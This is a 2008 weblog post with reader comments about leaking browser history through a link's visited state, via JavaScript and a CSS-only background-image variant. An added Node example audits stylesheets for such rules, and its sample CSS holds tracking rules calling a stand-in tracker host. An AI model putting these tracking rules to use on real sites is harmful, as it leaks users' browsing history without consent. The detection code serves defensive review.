Weblog entry #270 for simonw
Browser history checking
Posted by simonw on Thu 31 Jul 2008 at 00:56
Everyone is having fun working out the gender of their browsing habits.
http://www.mikeonads.com/2008/07/13/using-your-browser-url-history-estimate-gender/
The geek in me (after allowing it using NoScript) looked at the source, to see how it gathered my browsing history.
It opens an iframe with a list of URLs and checks the state of each URL to see if you have visited it, immediately leaking information from your browser history to any site you allow to run JavaScript.
I knew that the same origin implementation in common browsers was poor, but I didn't realize how poor. The World Wide Web needs a reimplementation; I would say redesign, but many of these issues were anticipated by the designers, it was just the implementors who cut corners.
Further reading:
http://crypto.stanford.edu/sameorigin/sameorigin.pdf
NoScript mentioned again -- oh dear I'm turning paranoid.
Comments on this Entry
Interesting, I got:
Likelihood of you being FEMALE is 4%
Likelihood of you being MALE is 96%
It is good.
Where did you find that in the source though? I could only see the comments.
[ Parent | Reply to this comment ]
Unfortunately, NoScript won't save you.
[ Parent | Reply to this comment ]
This seems to work the same way, using JavaScript, or did I miss something?
[ Parent | Reply to this comment ]
"This is an example of how the original CSS history hack found by Jeremiah Grossman can be modified to work without a single line of JavaScript. It uses the fact that properties within display: when combined with a:visited creates conditional logic."
So, this doesn't involve any JavaScript at all, and will still work even if you have NoScript installed.
[ Parent | Reply to this comment ]
Yes, sorry didn't work for me at work.
They are retrieving tagged images as backgrounds using the CSS.
[ Parent | Reply to this comment ]
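The CSS-only variant described in the comments works by attaching a fetch (a tagged background image) to a `:visited` rule, so it can be spotted by reviewing the stylesheet itself. As an added example, not code from the post or the linked sites, this JavaScript (Node) function audits a stylesheet for that pattern; the function name, the sample stylesheet and the `tracker.example` host are constructed for illustration.

```javascript
// Added example: flag :visited rules whose declarations fetch a URL.
// Matches innermost rule blocks with a regex; declarations are split on ';',
// so a url() value containing ';' (e.g. some data: URIs) is not handled.
function findVisitedFetches(css) {
  const findings = [];
  const text = css.replace(/\/\*[\s\S]*?\*\//g, ''); // drop CSS comments
  const rule = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = rule.exec(text)) !== null) {
    // Keep only the selectors in a comma list that depend on visited state.
    const selectors = m[1].split(',').map(s => s.trim())
      .filter(s => /:visited\b/i.test(s));
    if (selectors.length === 0) continue;
    for (const decl of m[2].split(';')) {
      const idx = decl.indexOf(':');
      if (idx < 0) continue;
      const property = decl.slice(0, idx).trim().toLowerCase();
      const value = decl.slice(idx + 1);
      // url(x), url('x') and url("x") all trigger a request when the rule applies.
      const urlRe = /url\(\s*(['"]?)(.*?)\1\s*\)/gi;
      let u;
      while ((u = urlRe.exec(value)) !== null) {
        for (const selector of selectors) {
          findings.push({ selector, property, url: u[2] });
        }
      }
    }
  }
  return findings;
}

// Constructed sample stylesheet, not taken from any real site.
const sampleCss = `
/* constructed sample */
a { color: blue; }
a:visited { color: purple; }
#l1:visited { background: url("https://tracker.example/hit?id=1"); }
#l2:visited, #l2:hover { background-image: url(https://tracker.example/hit?id=2) }
#l3 { background: url(/img/logo.png); }
`;

console.log(findVisitedFetches(sampleCss));
```

Rules that only recolour visited links, and `url()` fetches on selectors that do not depend on visited state, are not reported.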